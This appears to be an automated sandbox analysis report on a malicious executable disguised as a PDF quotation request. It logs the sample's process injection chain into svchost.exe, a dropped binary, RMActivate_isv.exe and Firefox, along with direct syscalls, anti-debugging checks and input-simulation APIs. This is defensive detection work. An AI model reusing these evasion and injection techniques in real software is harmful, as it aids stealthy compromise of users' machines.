Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C68A90 mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C38AA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C38AA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C86AA4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C36A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C36A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C36A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C36A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C36A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C36A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C36A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C40A5B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C40A5B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6CA6F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6CA6F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6CA6F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CDEA60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CACA72 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CACA72 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CBCA11 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6CA24 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C5EA2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C54A35 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C54A35 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6CA38 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CC69C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C649D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CFA9D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CBE9E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C629F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C629F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C309AD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C309AD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CB89B3 mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CB89B3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CB89B3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CB0946 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C56962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C56962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C56962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C7096E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C7096E mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C7096E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CD4978 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CD4978 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CBC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAE908 mov eax, dword ptr fs:[00000030h]7_2_03CAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAE908 mov eax, dword ptr fs:[00000030h]7_2_03CAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CBC912 mov eax, dword ptr fs:[00000030h]7_2_03CBC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C28918 mov eax, dword ptr fs:[00000030h]7_2_03C28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C28918 mov eax, dword ptr fs:[00000030h]7_2_03C28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB892A mov eax, dword ptr fs:[00000030h]7_2_03CB892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC892B mov eax, dword ptr fs:[00000030h]7_2_03CC892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5E8C0 mov eax, dword ptr fs:[00000030h]7_2_03C5E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CFA8E4 mov eax, dword ptr fs:[00000030h]7_2_03CFA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]7_2_03C6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]7_2_03C6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C30887 mov eax, dword ptr fs:[00000030h]7_2_03C30887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CBC89D mov eax, dword ptr fs:[00000030h]7_2_03CBC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C42840 mov ecx, dword ptr fs:[00000030h]7_2_03C42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C60854 mov eax, dword ptr fs:[00000030h]7_2_03C60854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C34859 mov eax, dword ptr fs:[00000030h]7_2_03C34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C34859 mov eax, dword ptr fs:[00000030h]7_2_03C34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CBE872 mov eax, dword ptr fs:[00000030h]7_2_03CBE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CBE872 mov eax, dword ptr fs:[00000030h]7_2_03CBE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC6870 mov eax, dword ptr fs:[00000030h]7_2_03CC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC6870 mov eax, dword ptr fs:[00000030h]7_2_03CC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CBC810 mov eax, dword ptr fs:[00000030h]7_2_03CBC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C52835 mov eax, dword ptr fs:[00000030h]7_2_03C52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C52835 mov eax, dword ptr fs:[00000030h]7_2_03C52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C52835 mov eax, dword ptr fs:[00000030h]7_2_03C52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C52835 mov ecx, dword ptr fs:[00000030h]7_2_03C52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C52835 mov eax, dword ptr fs:[00000030h]7_2_03C52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C52835 mov eax, dword ptr fs:[00000030h]7_2_03C52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6A830 mov eax, dword ptr fs:[00000030h]7_2_03C6A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD483A mov eax, dword ptr fs:[00000030h]7_2_03CD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD483A mov eax, dword ptr fs:[00000030h]7_2_03CD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C32FC8 mov eax, dword ptr fs:[00000030h]7_2_03C32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C32FC8 mov eax, dword ptr fs:[00000030h]7_2_03C32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C32FC8 mov eax, dword ptr fs:[00000030h]7_2_03C32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C32FC8 mov eax, dword ptr fs:[00000030h]7_2_03C32FC8
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,2_2_004238DA
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0041F250 SetUnhandledExceptionFilter,2_2_0041F250
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041A208
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00417DAA

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtWriteVirtualMemory: Direct from: 0x77762E3C
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtMapViewOfSection: Direct from: 0x77762D1C
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtNotifyChangeKey: Direct from: 0x77763C2C
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtCreateMutant: Direct from: 0x777635CC
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtResumeThread: Direct from: 0x777636AC
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtProtectVirtualMemory: Direct from: 0x77757B2E
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtQuerySystemInformation: Direct from: 0x77762DFC
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtAllocateVirtualMemory: Direct from: 0x77762BFC
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtReadFile: Direct from: 0x77762ADC
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtDelayExecution: Direct from: 0x77762DDC
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtWriteVirtualMemory: Direct from: 0x7776490C
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtQueryInformationProcess: Direct from: 0x77762C26
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtResumeThread: Direct from: 0x77762FBC
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtCreateUserProcess: Direct from: 0x7776371C
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtSetInformationThread: Direct from: 0x777563F9
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtAllocateVirtualMemory: Direct from: 0x77763C9C
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtSetInformationThread: Direct from: 0x77762B4C
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtQueryAttributesFile: Direct from: 0x77762E6C
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtReadVirtualMemory: Direct from: 0x77762E8C
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtCreateKey: Direct from: 0x77762C6C
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtQuerySystemInformation: Direct from: 0x777648CC
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtAllocateVirtualMemory: Direct from: 0x777648EC
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtQueryVolumeInformationFile: Direct from: 0x77762F2C
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtOpenSection: Direct from: 0x77762E0C
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtDeviceIoControlFile: Direct from: 0x77762AEC
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtAllocateVirtualMemory: Direct from: 0x77762BEC
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtQueryInformationToken: Direct from: 0x77762CAC
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtTerminateThread: Direct from: 0x77762FCC
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtCreateFile: Direct from: 0x77762FEC
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtOpenFile: Direct from: 0x77762DCC
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtOpenKeyEx: Direct from: 0x77762B9C
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtSetInformationProcess: Direct from: 0x77762C5C
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | NtProtectVirtualMemory: Direct from: 0x77762F9C
Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\RMActivate_isv.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: NULL target: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe protection: read write
Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: NULL target: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Thread register set: target process: 2324
Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Thread APC queued: target process: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 3030008
Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_00436CD7 LogonUserW
Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event
Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe"
Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | Process created: C:\Windows\SysWOW64\RMActivate_isv.exe "C:\Windows\SysWOW64\RMActivate_isv.exe"
Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: Quotation request -30112024_pdf.exe, xvYhLzczmazJ.exe, 0000000A.00000002.3133483615.0000000001A71000.00000002.00000001.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000A.00000000.1561964571.0000000001A71000.00000002.00000001.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000C.00000000.1723459280.0000000001421000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: xvYhLzczmazJ.exe, 0000000A.00000002.3133483615.0000000001A71000.00000002.00000001.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000A.00000000.1561964571.0000000001A71000.00000002.00000001.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000C.00000000.1723459280.0000000001421000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: xvYhLzczmazJ.exe, 0000000A.00000002.3133483615.0000000001A71000.00000002.00000001.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000A.00000000.1561964571.0000000001A71000.00000002.00000001.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000C.00000000.1723459280.0000000001421000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: ?Program Manager
Source: xvYhLzczmazJ.exe, 0000000A.00000002.3133483615.0000000001A71000.00000002.00000001.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000A.00000000.1561964571.0000000001A71000.00000002.00000001.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000C.00000000.1723459280.0000000001421000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: Quotation request -30112024_pdf.exe | Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW
Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_00472C3F GetUserNameW
Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte
